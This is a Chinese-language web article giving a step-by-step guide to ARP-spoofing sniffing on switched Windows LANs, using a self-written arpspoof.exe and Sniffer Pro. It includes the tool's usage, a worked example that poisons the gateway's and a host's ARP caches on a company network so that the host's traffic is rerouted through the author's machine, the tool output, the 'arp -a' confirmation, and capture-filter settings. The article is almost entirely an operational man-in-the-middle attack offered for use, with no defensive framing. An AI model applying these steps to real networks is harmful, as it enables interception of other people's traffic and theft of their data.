Windows交換環(huán)境中ARP Sniffer的實(shí)現(xiàn)

2019-11-05 01:53:18

字體：大中小

供稿：網(wǎng)友

　　根據(jù)交換環(huán)境中Sniffer實(shí)現(xiàn)的原理（詳見(jiàn)交換環(huán)境下Sniffer的實(shí)現(xiàn)），我寫了一個(gè)類似于linux環(huán)境下的ArpSpoof實(shí)現(xiàn)在Windows環(huán)境下的Arp Sniffer。
　　
　　在交換環(huán)境下Windows中實(shí)現(xiàn)Sniffer需要具備的條件:
　　
　　1、安裝Winpcap驅(qū)動(dòng)。
　　
　　2、我寫了一個(gè)類似于Linux環(huán)境下的ArpSpoof（我只在windows 2000 Server下測(cè)試過(guò)，其他期待您的測(cè)試）。
　　
　　3、一個(gè)Sniffer，如NetXray或者NAI Sniffer PRo(推薦)。
　　
　　具體的實(shí)現(xiàn)方法：
　　
　　使用ArpSpoof實(shí)現(xiàn)基于ARP的欺騙：
　　
　　C:/>arpspoof.exe
　　ARPSpoof, by netXeyes, Special Thanks BB
　　www.netXeyes.com 2002, dansnow@21cn.com
　　
　　Usage: ArpSpoof [Spoof ip1] [Spoof IP2] [Own IP]
　　　
　　
　　其中Spoof IP1和Spoof IP2是想要進(jìn)行欺騙和嗅探的IP地址，Own IP是自己的IP地址（注重這三個(gè)IP必須是在同一個(gè)局域網(wǎng)內(nèi)沒(méi)有跨越交換機(jī)或者路由器）。
　　
　　例如目前公司的局域網(wǎng)環(huán)境為192.168.0.xxx，子網(wǎng)掩碼為255.255.255.0，網(wǎng)關(guān)為192.168.0.1。我們的IP為192.168.0.29，想要Sniffer 192.168.0.2的數(shù)據(jù)包。
　　
　　由于網(wǎng)關(guān)為192.168.0.1，所以我們就只要欺騙192.168.0.1和192.168.0.2就可以了。也就是說(shuō)告訴192.168.0.1，192.168.0.2的MAC地址是自己（192.168.0.29)；然后再告訴192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。這樣以來(lái)所有的數(shù)據(jù)包都會(huì)發(fā)到192.168.0.29，并且由192.168.0.29實(shí)現(xiàn)轉(zhuǎn)發(fā)（windows 2000默認(rèn)可以進(jìn)行包轉(zhuǎn)發(fā)，至于Windows 9.x和Windows NT/XP我沒(méi)有測(cè)試過(guò)，希望您可以告訴我）。
　　
　　C:/>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
　　ARPSpoof, by netXeyes, Special Thanks BB
　　www.netXeyes.com 2002, dansnow@21cn.com
　　
　　Begin Spoof.........
　　
　　Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
　　Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
　　Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
　　Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
　　Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29
　　Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29
　　.....................................................
　　
　　是時(shí)候?qū)?92.168.0.1和192.168.0.2的ARP欺騙就開(kāi)始了，在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一樣的。
　　
　　C:/>arp -a
　　
　　Interface: 192.168.0.1 on Interface 0x1000004
　　Internet Address Physical Address Type
　　192.168.0.2 00-00-86-61-6b-4e dynamic
　　192.168.0.29 00-00-86-61-6b-4e dynamic
　　
　　同樣在192.168.0.2上面也會(huì)發(fā)現(xiàn)192.168.0.1和192.168.0.29的MAC地址是一樣的。
　　
　　這樣我們就在192.168.0.1和192.168.0.2之間實(shí)現(xiàn)了ARP欺騙。
　　
　　啟動(dòng)Sniffer Pro，在Define Filter里面的Address Type中選擇Hardware（注重不要選為通常的類型IP，否則抓不到什么有意義的東西），Station1和Station2選擇設(shè)置為Any即可。
　　
　　
　　這時(shí)候就開(kāi)始Sniffer了。
　　
　　
　　以上結(jié)果在我局域網(wǎng)環(huán)境中測(cè)試通過(guò)，不保證適用于所有的環(huán)境。
　　
　　在開(kāi)發(fā)及測(cè)試的過(guò)程中得到了BB的大力協(xié)助，以至于耽誤了其看八卦新聞的時(shí)間，內(nèi)疚了很久......:-)

（出處：http://www.vipcn.com）

上一篇：Cisco MDS 9000系列多層交換機(jī)擴(kuò)展SAN

下一篇：交換機(jī)WEB網(wǎng)管配置